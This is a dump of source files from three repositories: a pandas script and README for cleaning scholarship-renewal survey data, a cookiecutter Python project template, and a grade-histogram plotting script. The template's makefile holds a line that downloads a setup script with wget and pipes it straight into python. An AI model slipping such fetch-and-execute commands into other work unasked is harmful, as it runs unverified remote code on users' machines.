Imputar datos erróneos de acuerdo a que cumpla que materias inscritas = materias aprobadas + materias retiradas + materias reprobadas\n\t\n\"\"\"\n# Paso 1\noutput_data.Enrolled = input_data[13]\noutput_data.Approved = input_data[14].str.extract('^(\\d{1,2})$').astype('float')\noutput_data.Withdrawals = input_data[15]\noutput_data.Failed = input_data[16]\noutput_data.ReasonOfFailed = input_data[19]\n\n# Paso 2: hipótesis planteada: La columna inscritos está correcta\n# Descartando personas con eficiencia 1 y además quienes no tienen razón de reprobar\n# Se asume como pre-condición que es un requisito obligatorio para quienes reprobaron\n# materias expresar un motivo\noutput_data.Failed = output_data.apply(lambda x: 0 if x.Efficiency == 1.0 else (0 if pandas.isnull(x.ReasonOfFailed) else x.Failed), axis=1)\n\n# Recuperar valores perdidos en aprobadas\noutput_data.Approved = output_data.apply(lambda x: x.Enrolled-x.Failed-x.Withdrawals if pandas.isnull(x.Approved) else x.Approved, axis=1)\n\n# Dado que la proporción de estudiantes con materias retiradas es baja, se asume\n# que si retiradas > inscritas-aprobadas-reprobadas => 0\noutput_data.Withdrawals = output_data.apply(lambda x: 0 if x.Withdrawals > (x.Enrolled-x.Failed-x.Approved) else x.Withdrawals, axis=1)\n\n# Casos en que el error se encuentra en la columna aprobadas\noutput_data.Approved = output_data.apply(lambda x: x.Enrolled-x.Failed-x.Withdrawals if x.Enrolled != (x.Approved+x.Withdrawals+x.Failed) else x.Approved, axis=1)\n\n# Si eficiencia 1 => No hay razones de reprobar\noutput_data.ReasonOfFailed = output_data.apply(lambda x: None if x.Efficiency == 1.0 else x.ReasonOfFailed, axis=1)\n\n\"\"\"\n --- Materias inscritas en el semestre en curso ---\n * Data limpia, por lo que no se aplica ningún proceso\n\t\n\"\"\"\noutput_data.Subjects = input_data[20] \n\n\"\"\"\n --- Cantidad de veces en que inscribió Trabajo Especial/Pasantías de Grado ---\n 1. Unir columnas (21) y (22) de input_data\n 2. Codificar las categorías (No := 0, Si => ('1 vez' := 1, '2 veces' := 2, 'más de 2' := 3) )\n 3. Valores inconsistentes entre (21) y (22) se les imputará 0 dado que todos los casos en que ocurre son estudiantes de semestres bajos\n\n\"\"\"\n# Paso 1 y 2\nenrolled = input_data[21].replace(['Si', 'No'], [True, False]) \namounts = input_data[22].replace([r'^Primera.+', r'^Segunda.+', r'^Más.+', r'.*'], [1,2,3,numpy.nan], regex=True)\nenrolled_thesis = pandas.DataFrame({'enrolled': enrolled, 'amounts': amounts})\n\n# Paso 3\noutput_data.EnrollThesis = enrolled_thesis.apply(lambda x: x.amounts if pandas.isnull(x.amounts)==False and x.enrolled else 0, axis=1)\n\n\"\"\"\n --- Procedencia ---\n 1. Codificar las categorías (todos representarán estados)\n\n\"\"\"\noutput_data.Origin = input_data[23].replace([r'.+Libertador.*',r'(.+Sucre|.*(Baruta|Hatillo|Chacao|Altos|Guarenas|Valles)).*',r'Ara.*',r'Apu.*',r'Tác.*',r'Var.*',r'Mon.*',r'Por.*',r'Nue.*',r'Tru.*',r'Lar.*',r'Bol.*',r'Bar.*',r'Suc.*',r'Anz.*',r'Mér.*',r'Delta.*',r'Yar.*',r'Guár.*'], range(19), regex=True)\n\n\"\"\"\n --- Residencia ---\n 1. Codificar las categorías (todos representarán zonas de Dtto Capital y el Edo. Miranda)\n 2. 
A los valores faltantes, se imputa la moda\n\n\"\"\"\n\noutput_data.Residence = input_data[24].replace([r'.+Libertador.*',r'.*Sucre.*',r'.*Baruta.*',r'.*Hatillo.*',r'.*Chacao.*',r'.*Altos.*',r'.*Guarenas.*',r'.*Valles.*'], range(8), regex=True)\noutput_data.Residence = output_data.Residence.fillna(output_data.Residence.mode().iloc[0])\n\n\"\"\"\n --- Compañeros de habitación ---\n 1. Codificar las categorías \n valores posibles {padres, esposo o hijo, madre, padre, familiares maternos, familiares paternos, solo, otros}\n\n\"\"\"\noutput_data.Roommates = input_data[25].str.lower().str.replace('\\s', '')\noutput_data.Roommates = output_data.Roommates.replace([r'.*padres.*',r'.*(esposo(?<!su)|hijo).*',r'.*(mamá|madre).*',r'.*(papá|padre).*',r'.+maternos.*',r'.+paternos.*',r'sol[oa]',r'.+'], range(8), regex=True)\n\n\"\"\"\n --- Cambio de dirección ---\n 1. Codificar las categorías, valores posibles {si, no}\n\n\"\"\"\noutput_data.ChangeAddress = input_data[11].replace(['No', 'Si'], [0, 1])\n\n\"\"\"\n --- Tipo de vivienda ---\n 1. Codificar las categorías\n \tvalores posibles {quinta, edific, urbano, rural, alquilada, vecindad, estudiantil, otros}\n\n\"\"\"\noutput_data.HousingType = input_data[26].str.lower().replace([r'.*quinta.*',r'.*edific.*',r'.*urbano.*',r'.*rural.*',r'.*alquilada.*',r'.*vecindad.*',r'.*estudiantil.*', r'.*'],range(8),regex=True)\n\n\"\"\"\n --- Responsable económico ---\n 1. Codificar las categorías\n \tvalores posibles {padres, madre, padre, cónyugue, usted, familiares, otros}\n\n\"\"\"\noutput_data.Breadwinner = input_data[49].str.lower()\noutput_data.Breadwinner = output_data.Breadwinner.replace([r'.*padres.*',r'.*madre.*',r'.*padre.*',r'.*(cónyugue|esposo).*',r'.*(usted|ninguno).*',r'.*(familiares|abuel[oa]|herman[oa]|ti[oa]).*',r'.*'], range(7), regex=True)\n\n\"\"\"\n --- Carga familiar del responsable económico ---\n * Data limpia, por lo que no se aplica ningún proceso\n\n\"\"\"\noutput_data.FamilyLoad = input_data[50]\n\n\"\"\"\n --- Ingreso del responsable económico ---\n 1. Limpiar data, eliminando todos los caracteres que no sean numéricos y reemplazando las ',' por '.'\n 2. Imputar en las entradas vacías 0\n\n\"\"\"\noutput_data.BreadwinnerIncome = input_data[51].str.replace(',','.').str.replace('[a-zA-Z\\s]','')\noutput_data.BreadwinnerIncome = output_data.BreadwinnerIncome.apply(lambda x: x.replace('.','',1) if pandas.notnull(x) and x.count('.')>1 else x).astype('float')\noutput_data.BreadwinnerIncome = output_data.BreadwinnerIncome.fillna(0)\n\n\"\"\"\n --- Otros ingresos del responsable económico ---\n 1. Limpiar data, eliminando todos los caracteres que no sean numéricos\n 2. Imputar en las entradas vacías 0\n\n\"\"\"\noutput_data.BreadwinnerOthersIncomes = input_data[52].str.replace('[a-zA-Z\\s]','').str.extract('^(\\d+\\.?\\d*)+$').astype('float')\noutput_data.BreadwinnerOthersIncomes = output_data.BreadwinnerOthersIncomes.fillna(0)\n\n\"\"\"\n --- Ingresos totales del responsable económico ---\n 1. Suma de columnas de ingresos del responsable (ingresos + otros)\n\n\"\"\"\noutput_data.BreadwinnerTotalIncome = output_data.apply(lambda x: x.BreadwinnerIncome+x.BreadwinnerOthersIncomes, axis=1)\n\n\"\"\"\n --- Gastos de alimentación del responsable económico ---\n 1. Limpiar columna, de modo que sean numéricas las entradas\n 2. 
Imputar con la moda\n\n\"\"\"\noutput_data.BreadwinnerFood = input_data[55].str.replace('^(\\d+\\.?\\d*)(bs)?$', lambda x: x.group(1)).str.extract('^(\\d+\\.?\\d*)$').astype('float')\noutput_data.BreadwinnerFood = output_data.BreadwinnerFood.fillna(output_data.BreadwinnerFood.mode().iloc[0])\n\n\"\"\"\n --- Gastos de transporte público del responsable económico ---\n 1. Limpiar columna, de modo que sean numéricas las entradas\n 2. Imputar con la moda\n\n\"\"\"\noutput_data.BreadwinnerTransportation = input_data[56].str.replace('^(\\d+\\.?\\d*)(bs)?$', lambda x: x.group(1)).str.extract('^(\\d+\\.?\\d*)$').astype('float')\noutput_data.BreadwinnerTransportation = output_data.BreadwinnerTransportation.fillna(output_data.BreadwinnerTransportation.mode().iloc[0])\n\n\"\"\"\n --- Gastos médicos del responsable económico ---\n 1. Limpiar columna, de modo que sean numéricas las entradas\n 2. Imputar con la moda\n\n\"\"\"\noutput_data.BreadwinnerMedical = input_data[57].str.replace('^(\\d+\\.?\\d*)(bs)?$', lambda x: x.group(1)).str.extract('^(\\d+\\.?\\d*)$').astype('float')\noutput_data.BreadwinnerMedical = output_data.BreadwinnerMedical.fillna(output_data.BreadwinnerMedical.mode().iloc[0])\n\n\"\"\"\n --- Gastos odontológicos del responsable económico ---\n 1. Limpiar columna, de modo que sean numéricas las entradas\n 2. Imputar con la moda\n\n\"\"\"\noutput_data.BreadwinnerDental = input_data[58].str.extract('^(\\d+\\.?\\d*)$').astype('float')\noutput_data.BreadwinnerDental = output_data.BreadwinnerDental.fillna(output_data.BreadwinnerDental.mode().iloc[0])\n\n\"\"\"\n --- Gastos educativos del responsable económico ---\n 1. Imputar con 0\n\n\"\"\"\noutput_data.BreadwinnerStudy = input_data[59].fillna(0)\n\n\"\"\"\n --- Gastos en servicios del responsable económico ---\n 1. Limpiar columna, de modo que sean numéricas las entradas\n 2. Imputar con la moda\n\n\"\"\"\noutput_data.Services = input_data[60].str.replace('^(\\d+\\.?\\d*)(bs)?$', lambda x: x.group(1)).str.extract('^(\\d+\\.?\\d*)$').astype('float')\noutput_data.Services = output_data.Services.fillna(output_data.Services.mode().iloc[0])\n\n\"\"\"\n --- Gastos en condominio del responsable económico ---\n 1. Limpiar columna, de modo que sean numéricas las entradas\n 2. Imputar con la moda\n\n\"\"\"\noutput_data.Condominium = input_data[61].str.replace('^(\\d+\\.?\\d*)(bs)?$', lambda x: x.group(1)).str.extract('^(\\d+\\.?\\d*)$').astype('float')\noutput_data.Condominium = output_data.Condominium.fillna(output_data.Condominium.mode().iloc[0])\n\n\"\"\"\n --- Otros gastos del responsable económico ---\n 1. Imputar con la moda\n\n\"\"\"\noutput_data.BreadwinnerOtherExpenses = input_data[62].fillna(input_data[62].mode().iloc[0])\n\n\"\"\"\n --- Total de egresos del responsable económico ---\n 1. Suma de columnas de gastos (alimentación+transporte+médicos+odontológico+estudio+servicios+condominio+otros)\n \n\"\"\"\noutput_data.BreadwinnerTotalExpenses = output_data.apply(lambda x: x.BreadwinnerFood+x.BreadwinnerTransportation+x.BreadwinnerMedical+x.BreadwinnerDental+x.BreadwinnerStudy+x.Services+x.Condominium+x.BreadwinnerOtherExpenses, axis=1)\n\n\"\"\"\n --- Solicitud de ayuda financiera a la universidad ---\n 1. Codificar las categorías, valores posibles {no, si}\n\n\"\"\"\noutput_data.FinancialAid = input_data[30].replace(['No', 'Si'], [0, 1])\n\n\"\"\"\n --- Actividad generadora de ingresos ---\n 1. 
Codificar las categorías, valores posibles {no, si}\n\n\"\"\"\noutput_data.Work = input_data[32].replace(['No', 'Si'], [0, 1])\n\n\"\"\"\n --- Monto de la beca ---\n 1. Corrigiendo valores a modo que tengan 4 dígitos, cuyos valores posibles serán {1500, 2000} \n\n\"\"\"\noutput_data.Scolarship = input_data[34].apply(lambda x: x*10 if x<1000 else(x/10 if x>9999 else x))\noutput_data.Scolarship = output_data.Scolarship.apply(lambda x: 1500 if x<=1500 else 2000)\n\n\"\"\"\n --- Aporte de responsable económico ---\n 1. Imputar valores faltantes con 0\n\n\"\"\"\noutput_data.InputBreadwinner = input_data[35].fillna(0)\n\n\"\"\"\n --- Aporte de familiares y amigos ---\n 1. Imputar valores faltantes con 0\n\n\"\"\"\noutput_data.Family = input_data[36].fillna(0)\n\n\"\"\"\n --- Aporte por trabajo ---\n 1. Imputar valores faltantes con 0\n\n\"\"\"\noutput_data.InputWork = input_data[37].fillna(0)\n\n\"\"\"\n --- Ingresos totales ---\n 1. Suma de columnas de aportes (beca + responsable económico + familiares y amigos + trabajo)\n\n\"\"\"\noutput_data.TotalIncome = output_data.apply(lambda x: x.Scolarship+x.InputBreadwinner+x.Family+x.InputWork, axis=1)\n\n\"\"\"\n --- Gastos de alimentación ---\n 1. Llenar valores faltantes con la moda, dado que es poco probable que no haya gastos en alimentación\n\n\"\"\"\noutput_data.Food = input_data[39].fillna(input_data[39].mode().iloc[0])\n\n\"\"\"\n --- Gastos en transporte público ---\n 1. Llenar valores faltantes con la moda, dado que es poco probable que no haya gastos en transporte\n\n\"\"\"\noutput_data.Transportation = input_data[40].fillna(input_data[40].mode().iloc[0])\n\n\"\"\"\n --- Gastos médicos ---\n 1. Llenar valores faltantes con 0\n\n\"\"\"\noutput_data.Medical = input_data[41].fillna(0)\n\n\"\"\"\n --- Gastos odontológicos ---\n 1. Llenar valores faltantes con 0\n\n\"\"\"\noutput_data.Dental = input_data[42].fillna(0)\n\n\"\"\"\n --- Gastos personales ---\n 1. Llenar valores faltantes con la moda, dado que es poco probable que no haya gastos personales\n\n\"\"\"\noutput_data.Personal = input_data[43].fillna(input_data[43].mode().iloc[0])\n\n\"\"\"\n --- Gastos en alquiler ---\n 1. Filtrar personas con vivienda alquilada o residencia estudiantil\n 2. Almacenar temporalmente en el dataset la columna 27 (precio de alquiler)\n 3. Para personas con tipo de vivienda distinto a vivienda alquilada o residencia estudiantil imputar con 0,\n Para los casos de valores nulos o 0 en personas con alquiler, asignar valor de columna 27\n Sino, dejar el valor de la columna Rental\n 4. Imputar con la moda en los casos que en ambas columnas estén sin valor\n\n\"\"\"\n# Paso 1\noutput_data.Rental = input_data[44]\n# Paso 2\noutput_data.AuxRentalColumn = input_data[27].str.replace('^(\\d+\\.?\\d*)(bs)?$', lambda x: x.group(1)).str.extract('^(\\d+\\.?\\d*)$').astype('float')\n# Paso 3\noutput_data.Rental = output_data.apply(lambda x: 0 if x.HousingType!=6 and x.HousingType!=4 else (x.AuxRentalColumn if pandas.isnull(x.Rental) or x.Rental<=0 else x.Rental), axis=1)\n# Paso 4\noutput_data.Rental = output_data.Rental.fillna(output_data.Rental.mode().iloc[0])\n\n\"\"\"\n --- Gastos en material de estudio ---\n * Columna limpia, por lo que no se aplica ningún proceso\n \n\"\"\"\noutput_data.Study = input_data[45]\n\n\"\"\"\n --- Gastos en recreación ---\n 1. Llenar valores faltantes con la moda\n \n\"\"\"\noutput_data.Entertainment = input_data[46].fillna(input_data[46].mode().iloc[0])\n\n\"\"\"\n --- Otros gastos ---\n 1. 
Llenar valores faltantes con la moda\n \n\"\"\"\noutput_data.OtherExpenses = input_data[47].fillna(input_data[47].mode().iloc[0])\n\n\"\"\"\n --- Total de egresos ---\n 1. Suma de columnas de gastos (alimentación+transporte+médicos+odontológico+personales+alquiler+estudio+recreación+otros)\n \n\"\"\"\noutput_data.TotalExpenses = output_data.apply(lambda x: x.Food+x.Transportation+x.Medical+x.Dental+x.Personal+x.Rental+x.Study+x.Entertainment+x.OtherExpenses, axis=1)\n\n\"\"\"\n --- Rating ---\n * Columna limpia, por lo que no se aplica ningún proceso \n\n\"\"\"\noutput_data.Rating = input_data[64]\n\n# Eliminando columnas que sirvieron para brindar integridad a otras pero que no aportan información relevante\n# Edad := 3 | Precio de Alquiler := 52\noutput_data = output_data.drop(output_data.columns[[3, 52]], axis=1)\n\n# Generando salida\noutput_data.to_csv(project+'/dat/becas_crema.csv', \n\t\tindex=False, float_format='%.3f', \n\t\theader=['C.I.', 'Período Académico Renovado (Año)', 'Período Académico Renovado (ID)', 'Fecha de Nacimiento', 'Estado Civil', 'Sexo', 'Escuela', \n\t\t'Año de Ingreso', 'Modo de Ingreso', 'Promedio Ponderado', 'Eficiencia', 'Semestre', 'Materias Inscritas (Semestre y/o Año Anterior)', \n\t\t'Materias Aprobadas (Semestre y/o Año Anterior)', 'Materias Retiradas (Semestre y/o Año Anterior)', 'Materias Reprobadas (Semestre y/o Año Anterior)', \n\t\t'Motivo de Materias Reprobadas', 'Materias Inscritas Actualmente', 'Tesis Inscrita', 'Procedencia', 'Residencia', 'Compañeros de Habitación', \n\t\t'Cambio de Dirección', 'Tipo de Vivienda', 'Responsable Económico', 'Carga Familiar', 'Ingresos Responsable Económico', 'Otros Ingresos Responsable Económico', \n\t\t'Total de Ingresos Responsable Económico', 'Alimentación Responsable Económico', 'Transporte Responsable Económico', 'Gastos Médicos Responsable Económico', \n\t\t'Gastos Odontológicos Responsable Económico', 'Gastos de Estudio Responsable Económico', 'Servicios Públicos', 'Condominio', 'Otros Gastos Responsable Económico', \n\t\t'Total Egresos Responsable Económico', 'Ayuda financiera', 'Trabajo', 'Beca', 'Aporte de Responsable Económico', 'Aporte Familiar', 'Ingresos Laborales', \n\t\t'Ingresos Totales', 'Alimentación', 'Transporte', 'Gastos Médicos', 'Gastos Odontológicos', 'Gastos Personales', 'Gastos de Alquiler', 'Gastos Estudiantiles', \n\t\t'Recreación', 'Otros Gastos', 'Total Egresos', 'Puntuación'],\n\t\tdate_format='%d/%m/%Y')" }, { "alpha_fraction": 0.7725694179534912, "alphanum_fraction": 0.7829861044883728, "avg_line_length": 25.090909957885742, "blob_id": "6d2be7f1a86ee038a61a2b64b7990d9f40e0e552", "content_id": "20eb21bd4bdc663358a1e4eabbd013a7794de826", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 582, "license_type": "no_license", "max_line_length": 78, "num_lines": 22, "path": "/README.md", "repo_name": "DataMiningUCV/preprocesamiento-de-datos-josseline06", "src_encoding": "UTF-8", "text": "# Becas Crema: Limpieza y Preparación de los Datos\n\n## Descripción\n\nDado un dataset acerca del proceso de renovación de becas, preparar la data\npara su posterior análisis.\n\nEsta solución ha sido desarrollada con Python 2.7\n\n## Requerimientos\n\nPara instalar los requerimientos necesarios para el funcionamiento de este\nproyecto debe hacer el siguiente comando\n\n```\npip install -r requeriments.txt\n\n```\nCabe destacar que debe correrse desde el directorio base del proyecto para la \nlocalización adecuada de los archivos de entrada como 
de salida.\n\n##### by Josseline Perdomo - Enero 2016\n\n\n" } ]
2
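The preprocessed.py record above applies one pandas idiom to almost every column: normalize values with a regex replace, then impute whatever is left missing or invalid with the column mode via `fillna(series.mode().iloc[0])`. A minimal, self-contained sketch of that pattern follows; the sample values are invented, not taken from the Becas Crema dataset.

```python
import numpy
import pandas

# Hypothetical sample: a categorical column with typos and gaps,
# mirroring the CivilStatus cleanup in preprocessed.py.
raw = pandas.Series(['soltera', 'casado', 'xxx', None, 'soltero', 'soltera'])

# 1. Map known categories to codes; anything unrecognized becomes NaN.
codes = raw.str.lower().replace(
    [r'^soltero.*|^soltera.*', r'^casado.*', r'.*'],
    [0, 1, numpy.nan],
    regex=True,
)

# 2. Impute the remaining gaps with the mode, exactly as the script does.
codes = codes.fillna(codes.mode().iloc[0])
print(codes.tolist())  # -> [0.0, 1.0, 0.0, 0.0, 0.0, 0.0]
```

The ordering of the regex list matters: once a value has been replaced by a numeric code, the trailing catch-all `.*` no longer applies to it, which is the behavior the original script relies on throughout.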
MrLYC/lpyprj
https://github.com/MrLYC/lpyprj
1f10dec34db20cd9e0dbdbfe1c3aec3181f9a7d5
2ab3747872791bafa05b85778bbae98955c39625
6c3d76145e5bb0878ce7972b3edd266e09033aba
refs/heads/master
2020-12-14T08:54:32.416041
2015-07-03T07:36:44
2015-07-03T07:37:10
23,572,569
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6231505870819092, "alphanum_fraction": 0.6301131248474121, "avg_line_length": 25.720930099487305, "blob_id": "00c1cc4b201327a19d85158734043a7ad9b062e7", "content_id": "99bcb351e36abc4032043d7eb4baa6378f9e989f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1149, "license_type": "no_license", "max_line_length": 75, "num_lines": 43, "path": "/{{cookiecutter.repo_name}}/setup.py", "repo_name": "MrLYC/lpyprj", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport sys\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\n\nfrom setuptools import find_packages\n\n\ndef requirements_file_to_list(fn=\"requirements.txt\"):\n with open(fn, 'rb') as f:\n return [x.rstrip() for x in list(f) if x and not x.startswith('#')]\n\n\nif sys.argv[-1] == 'publish':\n os.system('python setup.py sdist upload')\n sys.exit()\n\nsetup(\n name='{{ cookiecutter.project_name }}',\n version='{{ cookiecutter.version }}',\n description='{{ cookiecutter.project_short_description }}',\n long_description=open('README.rst', 'a+').read(),\n author='{{ cookiecutter.author }}',\n author_email='{{ cookiecutter.email }}',\n packages=find_packages(),\n install_requires=requirements_file_to_list(),\n license='BSD',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: BSD License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n ],\n)\n" }, { "alpha_fraction": 0.7454873919487, "alphanum_fraction": 0.75, "avg_line_length": 26.024391174316406, "blob_id": "5b750f43deee102084a6b423a2d6bce7588d84db", "content_id": "be4c28eca364c505a0c46cab6ef320f0248acf7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1108, "license_type": "no_license", "max_line_length": 77, "num_lines": 41, "path": "/README.md", "repo_name": "MrLYC/lpyprj", "src_encoding": "UTF-8", "text": "# lpyprj\nThe project template created by LYC\n\n## Quick start\n### 1. clone the project.\nFrom github:\n`$ git clone https://github.com/MrLYC/lpyprj.git`\n\nOr from git@osc:\n`$ git clone https://git.oschina.net/Mr_LYC/lpyprj.git`\n\n### 2. install requirements.\nChange directory to project:\n`$ cd lpyprj`\n\nInstall pip to install requirements, if you didn't installed it yet:\n`$ sudo make setuptools`\n\nInstall requirements with sudo:\n`$ sudo make requirements`\n\n### 3. create your new project.\nUse cookiecutter to create your new project:\n`$ cookiecutter $path_of_lpyprj`\n\nReplace the var $path_of_lpyprj to the real path which the project lpyprj is.\nAnd then, input the infomations according to the hints to finish this step.\n\n### 4. initalize your project.\nFirst, change the directory to your project.\nThen, initalize git:\n`$ git init`\n\nMake virtual environment as your developing environment:\n`$ make dev-init`\n\n### 5. 
switch to the virtualenv of this project and start to develop\nSwitch your Python environment and anchor here:\n`$ source .dev/toggle`\n\nIf you want to switch your environment back, call it again.\n" }, { "alpha_fraction": 0.7480915784835815, "alphanum_fraction": 0.7480915784835815, "avg_line_length": 25.200000762939453, "blob_id": "38ff14c435b3b88b074f915a36085632f3b60836", "content_id": "29c050d4fc0d9c32674b0b3ffa9576ed405267a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 262, "license_type": "no_license", "max_line_length": 79, "num_lines": 10, "path": "/makefile", "repo_name": "MrLYC/lpyprj", "src_encoding": "UTF-8", "text": "setuptools:\n\twget https://bootstrap.pypa.io/ez_setup.py -O - | python && rm setuptools*.zip\n\teasy_install pip\n\nrequirements: requirements.txt\n\tpip install -r requirements.txt\n\nauthor-config:\n\tgit config user.email [email protected] --local\n\tgit config user.name MrLYC --local\n" }, { "alpha_fraction": 0.5901639461517334, "alphanum_fraction": 0.5983606576919556, "avg_line_length": 23.200000762939453, "blob_id": "97726977bc6317dd4d8954953c0ab1819adffd97", "content_id": "e5aeebacd5455876d5b115ce405f10629492d5c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 122, "license_type": "no_license", "max_line_length": 40, "num_lines": 5, "path": "/{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/__init__.py", "repo_name": "MrLYC/lpyprj", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# encoding: utf-8\n\n__author__ = '{{ cookiecutter.author }}'\n__email__ = '{{ cookiecutter.email }}'\n\n" }, { "alpha_fraction": 0.5641025900840759, "alphanum_fraction": 0.7435897588729858, "avg_line_length": 18.5, "blob_id": "b01294950b2ef87ffbbe80af9836ac2eb90603e6", "content_id": "681f4e960a3456ba7b0ac3aa552685e462cc8438", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 39, "license_type": "no_license", "max_line_length": 19, "num_lines": 2, "path": "/requirements.txt", "repo_name": "MrLYC/lpyprj", "src_encoding": "UTF-8", "text": "cookiecutter==0.7.2\nvirtualenv==1.11.6\n" } ]
5
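The lpyprj template above renders `{{ cookiecutter.* }}` placeholders (project_name, version, project_short_description, author, email, plus the repo_name directory), which cookiecutter reads from a cookiecutter.json at the template root. That file is not part of this record, so the sketch below is a plausible reconstruction: only the keys are dictated by the template files, while every value is a made-up example.

```python
import json

# Hypothetical defaults; cookiecutter prompts for each key and offers
# these values, then substitutes the answers into the template files.
context = {
    "repo_name": "myproject",
    "project_name": "myproject",
    "version": "0.1.0",
    "project_short_description": "A Python project generated from lpyprj.",
    "author": "Jane Doe",
    "email": "jane@example.com",
}

with open("cookiecutter.json", "w") as f:
    json.dump(context, f, indent=4)
```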
AtilioA/GraficosNotasUFES
https://github.com/AtilioA/GraficosNotasUFES
d01484cff36bce2e834b06c0839f506fab8aa099
350182f96718c77d10d17da8f63238c337cb6035
407639d4cf97487d6fb4cf8a8be8f981bee31884
refs/heads/master
2019-03-20T14:20:00.481725
2019-02-03T19:14:48
2019-02-03T19:14:48
123,958,948
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5817524790763855, "alphanum_fraction": 0.6027551889419556, "avg_line_length": 40, "blob_id": "f1da37d6051e005b57f9ea4732c6e559425e97d6", "content_id": "76cc31730552884c5d5ae27232af2bd190d8ef02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4495, "license_type": "no_license", "max_line_length": 177, "num_lines": 108, "path": "/histogramanotas.py", "repo_name": "AtilioA/GraficosNotasUFES", "src_encoding": "UTF-8", "text": "import re\nimport os\nimport extras\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nfrom scipy.stats import norm # Uma função do mlab está sendo descontinuada e substituída por esta\n\n\n# Abre o diretório das notas e prepara apresentação para o usuário\npastaRepo = os.getcwd()\npastaHistogramas = os.path.join(pastaRepo, \"Histogramas\\\\\")\npastaHistogramasAleatórios = os.path.join(pastaRepo, \"Histogramas\\\\Aleatórios\\\\\")\npastaNotas = os.path.join(pastaRepo, \"Notas.txt\")\narquivos = os.listdir(f'{pastaNotas}')\narquivos = [w[:-4] for w in arquivos] # Remove '.txt' dos nomes dos arquivos\nopçãoArquivo = 'B'\n\n# Abre arquivo com notas, gera notas aleatórias e armazena em uma nova lista ou mostra arquivos disponíveis. Repete até o usuário entrar com 'Z'.\nwhile (opçãoArquivo not in 'Z'):\n opçãoArquivo = input('Insira o nome do arquivo [universidadeano], ou\\n[A] para dados aleatórios\\n[B] para mostrar os arquivos disponíveis\\n[Z] para sair\\n ').upper().strip()\n\n if opçãoArquivo in 'A':\n universidade = 'NOTAS ALEATÓRIAS'\n ano = ''\n notas = []\n idHistograma = extras.notasAleatorias()\n txt = open(f'{pastaNotas}\\\\notas2049.txt', 'r')\n for linha in txt:\n notas.append(float(linha))\n\n elif opçãoArquivo in 'B':\n print(\"\\nARQUIVOS DISPONÍVEIS: \")\n for i in range(1, len(arquivos) - 1):\n print(f'> {arquivos[i]:^40}',)\n print(\"\\n\")\n\n elif opçãoArquivo in 'Z':\n exit()\n\n elif opçãoArquivo not in 'ABZ':\n universidade = re.split('(\\\\d+)', opçãoArquivo)[0].strip()\n ano = (re.split('(\\\\d+)', opçãoArquivo)[1])\n print(\"\\n\", universidade, ano)\n idHistograma = f'{universidade} {ano}'\n notas = []\n txt = open(f'{pastaNotas}\\\\{opçãoArquivo}.txt', 'r')\n for linha in txt:\n notas.append(float(linha))\n\n if opçãoArquivo not in 'B':\n # Estatísticas das notas\n n = len(notas)\n minhaNota = 777 # Insira uma nota aqui para calcular o z-score dela\n mediaNotas = np.mean(notas)\n medianaNotas = np.median(notas)\n stdNotas = np.std(notas)\n zscore = (minhaNota - mediaNotas) / stdNotas\n # idHistograma = f'{mediaNotas:.2f}_{stdNotas:.2f}_{n}'\n\n print(f'A média das notas é {mediaNotas:.2f}.')\n print(f'A mediana das notas é {medianaNotas:.2f}.')\n print(f'O desvio padrão é de {stdNotas:.2f} pontos.')\n print(f'Seu z-score é {zscore:.2f}.\\n')\n\n menorNota = min(notas)\n maiorNota = max(notas)\n num_bins = int(np.ceil((maiorNota - menorNota) / 10))\n # plt.hist(notas, num_bins, normed = 0, FaceColor = [0.22745, 0.49412, 0.98824]) # Sem normalizar\n\n # Customização do histograma\n\n # Cores (converte RGB entre 0 e 255 para RGB entre 0 e 1)\n r, g, b = 56 / 255, 126 / 255, 252 / 255 # (azul)\n r2, g2, b2 = 214 / 255, 45 / 255, 32 / 255 # (vermelho)\n\n # Customização da linha de média (aleatória se os dados forem aleatórios)\n if opçãoArquivo not in 'A':\n marcador = ''\n estilo = '--'\n else:\n marcador = random.choice(['^', 'o', '.', '|', ',', 'p', '', '', ''])\n estilo = random.choice(['-', '--', '-.', ':'])\n\n 
# Construção do histograma\n        fig = plt.figure()\n        plt.title(f'{universidade} {ano}')\n        plt.xlabel('Notas')\n        plt.ylabel('Frequência')\n        plt.subplots_adjust(left = 0.15)\n        # Linha de média\n        n, bins, _ = plt.hist(notas, num_bins, density = 1, facecolor = [r, g, b])\n        media = norm.pdf(bins, mediaNotas, stdNotas)\n        plt.plot(bins, media, f'r{marcador}{estilo}')\n        # Limites de nota e da frequência; o primeiro de acordo com as menores notas possíveis no ENEM, por exemplo\n        # plt.axis([min, max, 0, 1000]) # se normed = 0 (sem normalizar o gráfico)\n        plt.grid(True)\n        # Salva .png do histograma\n        if opçãoArquivo in 'A':\n            pathHistograma = f'{pastaHistogramasAleatórios}{idHistograma}'\n            plt.savefig(f'{pathHistograma}.png')\n            print(f'Histograma salvo em {pastaHistogramasAleatórios}')\n        else:\n            pathHistograma = f'{pastaHistogramas}{idHistograma}'\n            plt.savefig(f'{pathHistograma}.png')\n            print(f'Histograma salvo em {pastaHistogramas}')\n        plt.show()\n" }, { "alpha_fraction": 0.7384341359138489, "alphanum_fraction": 0.7882562279701233, "avg_line_length": 59.21428680419922, "blob_id": "6ab93a5d5064468d5770161adc782f4f4b1259a1", "content_id": "f923dc37fd9175ea88b2735d24a097571a5c86a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", 